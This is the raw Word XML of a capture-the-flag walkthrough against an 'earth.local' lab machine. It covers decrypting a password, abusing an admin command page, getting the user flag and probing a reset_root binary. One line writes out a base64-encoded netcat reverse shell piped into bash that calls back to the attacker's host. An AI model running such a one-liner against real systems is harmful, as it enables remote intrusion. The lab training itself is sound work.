    <w:p w14:paraId="4D6456FD" w14:textId="1D69F7C9" w:rsidR="006A3D1E" w:rsidRDefault="006A3D1E"/>
    <w:p w14:paraId="4B7E4E2D" w14:textId="283A40CF" w:rsidR="00B34C5B" w:rsidRDefault="0039001C">
      <w:r>
        <w:t>Clicking the link leads you to “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>earth.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/admin/login”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF5E052" w14:textId="5DD4FB12" w:rsidR="003E4892" w:rsidRDefault="00D823F8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251669504" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5F8C2C31" wp14:editId="09BE4579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31510" cy="241300"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20463"/>
                <wp:lineTo x="21538" y="20463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401B">
        <w:t>I tried the default credentials of admin and admin, however it failed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452AB125" w14:textId="2858D352" w:rsidR="006A3D1E" w:rsidRDefault="00D823F8">
      <w:r>
        <w:t>This error message doesn’t exactly reveal much about if the username is a valid username.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9D555A" w14:textId="0AE00C87" w:rsidR="006A3D1E" w:rsidRDefault="006A3D1E"/>
    <w:p w14:paraId="504D5EAC" w14:textId="62516DA6" w:rsidR="006A3D1E" w:rsidRDefault="00D07D33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2BDACC3" wp14:editId="2AFB8341">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>182372</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2976880" cy="369570"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20041"/>
                <wp:lineTo x="21425" y="20041"/>
                <wp:lineTo x="2142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1" cy="37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xt, I enumerate the other </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C084E4" w14:textId="2A5D8F5B" w:rsidR="006A3D1E" w:rsidRDefault="006A3D1E"/>
    <w:p w14:paraId="4A8BF68A" w14:textId="2EE753B6" w:rsidR="006A3D1E" w:rsidRDefault="00456EC0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251671552" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2F8EBD16" wp14:editId="7B8327EF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>35763</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="51816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21" y="21340"/>
                <wp:lineTo x="215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248C8" w14:textId="205318B3" w:rsidR="006A3D1E" w:rsidRDefault="006A3D1E"/>
    <w:p w14:paraId="4267116D" w14:textId="07145F4A" w:rsidR="006A3D1E" w:rsidRDefault="006A3D1E"/>
    <w:p w14:paraId="33984172" w14:textId="4113EB3B" w:rsidR="006A3D1E" w:rsidRDefault="00405576">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251672576" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="675D9A20" wp14:editId="71633C44">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>1828724</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>246380</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="164211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299" y="21531"/>
                <wp:lineTo x="2129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6B">
        <w:t>Opening robots.txt we can see the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F5EE94" w14:textId="56A63389" w:rsidR="008F63F1" w:rsidRDefault="008F63F1"/>
    <w:p w14:paraId="05FDD448" w14:textId="7CE3948D" w:rsidR="008F63F1" w:rsidRDefault="008F63F1"/>
    <w:p w14:paraId="34F3F68F" w14:textId="0E46A019" w:rsidR="008F63F1" w:rsidRDefault="008F63F1"/>
    <w:p w14:paraId="467891E2" w14:textId="1A816ACA" w:rsidR="008F63F1" w:rsidRDefault="008F63F1"/>
    <w:p w14:paraId="71EA7922" w14:textId="4B35FE91" w:rsidR="008F63F1" w:rsidRDefault="008F63F1"/>
    <w:p w14:paraId="7173EC32" w14:textId="07392D1C" w:rsidR="008F63F1" w:rsidRDefault="008F63F1"/>
    <w:p w14:paraId="378430DD" w14:textId="65534FC5" w:rsidR="008F63F1" w:rsidRDefault="008F63F1"/>
    <w:p w14:paraId="48282F54" w14:textId="48AC7F88" w:rsidR="008F63F1" w:rsidRDefault="008F63F1"/>
    <w:p w14:paraId="1CA57254" w14:textId="121FC5E7" w:rsidR="008F63F1" w:rsidRDefault="008F63F1"/>
    <w:p w14:paraId="67F7EA09" w14:textId="2CDA412C" w:rsidR="008F63F1" w:rsidRDefault="008F63F1"/>
    <w:p w14:paraId="4C031006" w14:textId="2C8A8442" w:rsidR="008F63F1" w:rsidRDefault="008F63F1"/>
    <w:p w14:paraId="590095CB" w14:textId="067F60F8" w:rsidR="008F63F1" w:rsidRDefault="008F63F1"/>
    <w:p w14:paraId="5FB7C3DD" w14:textId="27E1D0D9" w:rsidR="008F63F1" w:rsidRDefault="008F63F1"/>
    <w:p w14:paraId="1D15ED53" w14:textId="32E75EAA" w:rsidR="008F63F1" w:rsidRDefault="00106933">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251673600" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7C16516A" wp14:editId="0AC5D870">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>205638</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="31146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34" y="20855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576">
        <w:t>The last line is important, because it is significantly different from the other entries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA27BE4" w14:textId="3A80810C" w:rsidR="008F63F1" w:rsidRDefault="004D140B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251674624" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="05336541" wp14:editId="6EE36BD1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>256489</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="57315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8" y="21403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7185A" w14:textId="7E07D57D" w:rsidR="008F63F1" w:rsidRDefault="004103F6">
      <w:r>
        <w:t>Navigate to testdata.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D961DD1" w14:textId="6D0032BD" w:rsidR="004103F6" w:rsidRDefault="004103F6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BA76ACE" wp14:editId="429C0AAD">
            <wp:extent cx="5731510" cy="366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477" w14:textId="08D430F1" w:rsidR="008F63F1" w:rsidRDefault="004103F6">
      <w:r>
        <w:t>This is the data used to encrypt the first ever message encryption on the first page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E11925" w14:textId="6B8E5E41" w:rsidR="008F63F1" w:rsidRDefault="008F63F1"/>
    <w:p w14:paraId="4FC2DE32" w14:textId="01D3044D" w:rsidR="008F63F1" w:rsidRDefault="008F63F1"/>
    <w:p w14:paraId="1758B32D" w14:textId="6445E762" w:rsidR="008F63F1" w:rsidRDefault="001C684E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8CA9555" wp14:editId="78662917">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>203</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3891686" cy="1910056"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21334"/>
                <wp:lineTo x="21466" y="21334"/>
                <wp:lineTo x="2146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86" cy="19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A61A8" w14:textId="0AA137CF" w:rsidR="008F63F1" w:rsidRDefault="008F63F1"/>
    <w:p w14:paraId="65E6C881" w14:textId="61A6E191" w:rsidR="008F63F1" w:rsidRDefault="008F63F1"/>
    <w:p w14:paraId="5A28564F" w14:textId="5883FE59" w:rsidR="008F63F1" w:rsidRDefault="008F63F1"/>
    <w:p w14:paraId="5AC17A84" w14:textId="4B860028" w:rsidR="008F63F1" w:rsidRDefault="008F63F1"/>
    <w:p w14:paraId="6EC0CF14" w14:textId="75D51638" w:rsidR="008F63F1" w:rsidRDefault="008F63F1"/>
    <w:p w14:paraId="0AC2482D" w14:textId="5A579421" w:rsidR="008F63F1" w:rsidRDefault="008F63F1"/>
    <w:p w14:paraId="6CDA8F27" w14:textId="3EEE2879" w:rsidR="008F63F1" w:rsidRDefault="001C684E">
      <w:r>
        <w:t>The last line is what we are trying to crack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C514563" w14:textId="7F63C675" w:rsidR="008F63F1" w:rsidRDefault="00825238">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31C1761C" wp14:editId="0D6EA0B9">
            <wp:extent cx="5731510" cy="20955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DE58" w14:textId="35F1C7AD" w:rsidR="008F63F1" w:rsidRDefault="00825238">
      <w:r>
        <w:t>Cyber chef has allowed me to decrypt the output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1169EE" w14:textId="6683FFB7" w:rsidR="008F63F1" w:rsidRDefault="00785EA2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251676672" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="132F73FD" wp14:editId="70F6080A">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>9678</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="27146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C4BB" w14:textId="48A113DE" w:rsidR="008F63F1" w:rsidRDefault="008F63F1"/>
    <w:p w14:paraId="223D4989" w14:textId="243AC99D" w:rsidR="008F63F1" w:rsidRDefault="008F63F1"/>
    <w:p w14:paraId="7E555264" w14:textId="2A46B5AC" w:rsidR="008F63F1" w:rsidRDefault="008F63F1"/>
    <w:p w14:paraId="75B45E53" w14:textId="23938400" w:rsidR="008F63F1" w:rsidRDefault="008F63F1"/>
    <w:p w14:paraId="6D3BB290" w14:textId="263E31DB" w:rsidR="008F63F1" w:rsidRDefault="008F63F1"/>
    <w:p w14:paraId="3B0B55A2" w14:textId="680179DE" w:rsidR="008F63F1" w:rsidRDefault="00785EA2">
      <w:r>
        <w:t>I will use the output as the possible password.</w:t>
      </w:r>
      <w:r w:rsidR="00704E84">
        <w:t xml:space="preserve"> “</w:t>
      </w:r>
      <w:r w:rsidR="00704E84" w:rsidRPr="00704E84">
        <w:t>earthclimatechangebad4humans</w:t>
      </w:r>
      <w:r w:rsidR="00704E84">
        <w:t>”.</w:t>
      </w:r>
      <w:r w:rsidR="00115BCC">
        <w:t xml:space="preserve"> IT WORKED.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAD1C2F" w14:textId="723E6A66" w:rsidR="00E42746" w:rsidRDefault="003200E7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F84BFF1" wp14:editId="59E6DBDD">
            <wp:extent cx="5731510" cy="13627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1E56" w14:textId="219D0E55" w:rsidR="00E42746" w:rsidRDefault="003200E7">
      <w:r>
        <w:t xml:space="preserve">This will interpret </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> commands on the website, which means we can set up a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to gain access to the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3375B2" w14:textId="755565F4" w:rsidR="008F63F1" w:rsidRDefault="005029A3" w:rsidP="00A35555">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc145451294"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Exploitation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="68353FD1" w14:textId="0A26B601" w:rsidR="005029A3" w:rsidRDefault="000B3B4D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251677696" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4D162B0C" wp14:editId="0A210B8C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>192379</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="24193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30" y="21398"/>
                <wp:lineTo x="2143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162">
        <w:t xml:space="preserve">On the kali machine, set up the listening </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F86162">
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F86162">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5C48C2" w14:textId="7DB707F9" w:rsidR="008F63F1" w:rsidRDefault="008F63F1"/>
    <w:p w14:paraId="0129426A" w14:textId="0ACA3382" w:rsidR="008F63F1" w:rsidRDefault="008F63F1"/>
    <w:p w14:paraId="4E3F1A53" w14:textId="65E1C88A" w:rsidR="008F63F1" w:rsidRDefault="008F63F1"/>
    <w:p w14:paraId="21D74B53" w14:textId="38E9AAA6" w:rsidR="008F63F1" w:rsidRDefault="0022095C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251678720" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4285B15B" wp14:editId="77448548">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>96494</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2550795" cy="958215"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21042"/>
                <wp:lineTo x="21455" y="21042"/>
                <wp:lineTo x="2145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0679" w14:textId="6F33FFCF" w:rsidR="008F63F1" w:rsidRDefault="008F63F1"/>
    <w:p w14:paraId="1C42B9AB" w14:textId="46D99F60" w:rsidR="008F63F1" w:rsidRDefault="008F63F1"/>
    <w:p w14:paraId="25C3FFF1" w14:textId="07E68F96" w:rsidR="008F63F1" w:rsidRDefault="008F63F1"/>
    <w:p w14:paraId="57DEAC3A" w14:textId="7FBD0E93" w:rsidR="008F63F1" w:rsidRDefault="0022095C">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>However</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> when I try to connect using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, I receive an error telling me this is forbidden.</w:t>
      </w:r>
      <w:r w:rsidR="00A42ABF">
        <w:t xml:space="preserve"> Maybe this can be used to find the first flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E50F39" w14:textId="3921DED7" w:rsidR="00946E58" w:rsidRDefault="00946E58">
      <w:r>
        <w:t>I decided to snoop around the directory,</w:t>
      </w:r>
      <w:r w:rsidR="00A47823">
        <w:t xml:space="preserve"> and see what I could find.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636EA968" w14:textId="7A1800E9" w:rsidR="00A74DDA" w:rsidRDefault="00A74DDA" w:rsidP="00A74DDA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc145451295"/>
      <w:r>
        <w:t>Flag 1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="107C3C7E" w14:textId="55AB82C0" w:rsidR="00E51EC2" w:rsidRDefault="00E51EC2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FC3DC4A" wp14:editId="00C2FD43">
            <wp:extent cx="5731510" cy="11322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E4BB" w14:textId="2781C9A7" w:rsidR="00A74DDA" w:rsidRDefault="00E51EC2">
      <w:r>
        <w:t>I found it, user_flag.txt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0CF195" w14:textId="7D59021E" w:rsidR="008F63F1" w:rsidRDefault="00AA6BDC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5AB33C2C" wp14:editId="291846D1">
            <wp:extent cx="5686425" cy="1266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AFE8" w14:textId="6033E93A" w:rsidR="008F63F1" w:rsidRDefault="00AA6BDC">
      <w:r>
        <w:t>Now I have the first flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0109ACA9" w14:textId="61DFEEC2" w:rsidR="008F63F1" w:rsidRDefault="00D42287">
      <w:r>
        <w:t xml:space="preserve">Going back to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> there is another way to do it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D766BC" w14:textId="51D73C2B" w:rsidR="00752822" w:rsidRDefault="00752822" w:rsidP="004A6679">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc145451296"/>
      <w:r>
        <w:t xml:space="preserve">Encoding </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Netcat</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="492C3043" w14:textId="1D987E8B" w:rsidR="00752822" w:rsidRDefault="004A6679">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>First</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> we need to encode the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637C8D72" w14:textId="7E3B6C64" w:rsidR="008F63F1" w:rsidRDefault="000E5D71">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251679744" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="700FF234" wp14:editId="25ED57C2">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>6045</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="44767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508" y="21098"/>
                <wp:lineTo x="2150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38A5B" w14:textId="0A8F81FB" w:rsidR="008F63F1" w:rsidRDefault="008F63F1"/>
    <w:p w14:paraId="3E7A2126" w14:textId="287723E9" w:rsidR="008F63F1" w:rsidRDefault="002011D1">
      <w:r>
        <w:t>Now we can put that into the CLI command prompt</w:t>
      </w:r>
      <w:r w:rsidR="00FA3588">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CFECD7" w14:textId="586C3DBA" w:rsidR="00FA3588" w:rsidRPr="00427B5D" w:rsidRDefault="00FA3588">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00427B5D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">echo </w:t>
      </w:r>
      <w:r w:rsidR="00427B5D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00427B5D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>bmMgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguNTYuMTAyIDQ0NDQK</w:t>
      </w:r>
      <w:r w:rsidR="00427B5D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00427B5D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> | base64 -d | bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A017D4" w14:textId="78BC6474" w:rsidR="008F63F1" w:rsidRDefault="00A60F2D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39D7B2" wp14:editId="6E66A09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2768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22" y="21130"/>
                <wp:lineTo x="2152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B5D">
        <w:t>This command will decrypt it and then run in.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D926898" w14:textId="444363AE" w:rsidR="00DC00B4" w:rsidRDefault="00A60F2D">
      <w:r>
        <w:t>Now we are in.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592BD5CA" w14:textId="01B584DF" w:rsidR="008F63F1" w:rsidRDefault="008F63F1"/>
    <w:p w14:paraId="2BB7145D" w14:textId="3ED75A8C" w:rsidR="008F63F1" w:rsidRDefault="00433A33" w:rsidP="00433A33">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc145451297"/>
      <w:r>
        <w:t>Upgrade Shell</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="66B98054" w14:textId="20050CA1" w:rsidR="00433A33" w:rsidRDefault="00433A33">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CC2362E" wp14:editId="41A57DAB">
            <wp:extent cx="3752850" cy="666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931" w14:textId="4438BAEC" w:rsidR="00F545B1" w:rsidRDefault="00962FF6" w:rsidP="00823427">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc145451298"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251681792" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="61724E48" wp14:editId="6CCBA161">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>317830</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3202305" cy="2494280"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21446"/>
                <wp:lineTo x="21459" y="21446"/>
                <wp:lineTo x="2145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023" cy="24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06">
        <w:t>Finding Exploitable Binaries</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="2380B669" w14:textId="7D1C5D6B" w:rsidR="008F63F1" w:rsidRDefault="008F63F1"/>
    <w:p w14:paraId="5E937098" w14:textId="59536403" w:rsidR="008F63F1" w:rsidRDefault="008F63F1"/>
    <w:p w14:paraId="6F30BD66" w14:textId="3BDEEAFD" w:rsidR="008F63F1" w:rsidRDefault="008F63F1"/>
    <w:p w14:paraId="71E9CC57" w14:textId="31511D0B" w:rsidR="008F63F1" w:rsidRDefault="008F63F1"/>
    <w:p w14:paraId="0FD3F728" w14:textId="43F22E3D" w:rsidR="008F63F1" w:rsidRDefault="008F63F1"/>
    <w:p w14:paraId="3CE4BECA" w14:textId="6A31DCCC" w:rsidR="007B1D6E" w:rsidRDefault="007B1D6E"/>
    <w:p w14:paraId="15F067D6" w14:textId="42CC3B88" w:rsidR="007B1D6E" w:rsidRDefault="007B1D6E"/>
    <w:p w14:paraId="3014B27D" w14:textId="25103656" w:rsidR="007B1D6E" w:rsidRDefault="007B1D6E"/>
    <w:p w14:paraId="7A013B4F" w14:textId="1C4D3D23" w:rsidR="007B1D6E" w:rsidRDefault="007B1D6E"/>
    <w:p w14:paraId="5A2F2FDF" w14:textId="5C01AD3B" w:rsidR="007B1D6E" w:rsidRDefault="004022D9">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reset_root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> binary is a good file to look into. Using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> I will download this to my computer and inspect it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475FAAB7" w14:textId="3C25191B" w:rsidR="00E42E7B" w:rsidRDefault="00E42E7B"/>
    <w:p w14:paraId="7640E67D" w14:textId="0026BDF1" w:rsidR="00E42E7B" w:rsidRDefault="00E42E7B" w:rsidP="005C4D32">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc145451299"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>LTrace</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="62FADB95" w14:textId="3F77FF73" w:rsidR="00E42E7B" w:rsidRDefault="006939DB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="798FBBC3" wp14:editId="7B14EF2F">
            <wp:extent cx="5731510" cy="35363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2B3" w14:textId="133E4130" w:rsidR="00E42E7B" w:rsidRDefault="00457560">
      <w:r>
        <w:t>As you can see there are 3 missing files, they must be created before the binary can actually work.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3DD5D9" w14:textId="6601043C" w:rsidR="00E42E7B" w:rsidRDefault="00207496">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="500C69FB" wp14:editId="074AA983">
            <wp:extent cx="2781300" cy="1009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3D2C" w14:textId="4A110F04" w:rsidR="007B1D6E" w:rsidRDefault="00207496">
      <w:r>
        <w:t>After these are created run the binary.</w:t>
      </w:r>
    </w:p>
